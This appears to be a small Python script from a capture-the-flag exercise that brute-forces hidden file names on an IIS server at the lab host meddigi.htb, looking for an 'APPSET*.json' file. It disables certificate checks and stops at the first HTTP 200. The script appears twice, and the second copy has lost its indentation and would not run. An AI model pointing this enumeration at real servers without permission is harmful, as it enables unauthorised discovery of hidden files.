mvc1009/brute-iis.py

## brute-iis.py
#!/usr/bin/env python3

# Algorithm https://stackoverflow.com/a/68624309

import sys, os, requests
from itertools import combinations_with_replacement
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

s = requests.Session()

url="https://meddigi.htb/"
extension = ".json"
start = "APPSET"
max_length = 5

# only lower case due to we are targetting a IIS
characters = "abcdefgijklmnopqrstuvwxyz1234567890._-( )"

print("[!] Starting fuzzing")
for r in range(1, max_length+1):
        for combo in combinations_with_replacement(characters, r=r):
                r = s.get(url + start + ''.join(combo) + extension, verify=False, allow_redirects=False)
                print("Fuzzing: %s - %s " % (start + ''.join(combo) + extension, r.status_code ))
                if (r.status_code == 200):
                        print("[+] Found: %s" %(url + start + ''.join(combo) + extension))
                        sys.exit()
print("[!] Ending fuzzing")
	#!/usr/bin/env python3

	# Algorithm https://stackoverflow.com/a/68624309

	import sys, os, requests
	from itertools import combinations_with_replacement
	import urllib3
	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

	s = requests.Session()

	url="https://meddigi.htb/"
	extension = ".json"
	start = "APPSET"
	max_length = 5

	# only lower case due to we are targetting a IIS
	characters = "abcdefgijklmnopqrstuvwxyz1234567890._-( )"

	print("[!] Starting fuzzing")
	for r in range(1, max_length+1):
	for combo in combinations_with_replacement(characters, r=r):
	r = s.get(url + start + ''.join(combo) + extension, verify=False, allow_redirects=False)
	print("Fuzzing: %s - %s " % (start + ''.join(combo) + extension, r.status_code ))
	if (r.status_code == 200):
	print("[+] Found: %s" %(url + start + ''.join(combo) + extension))
	sys.exit()
	print("[!] Ending fuzzing")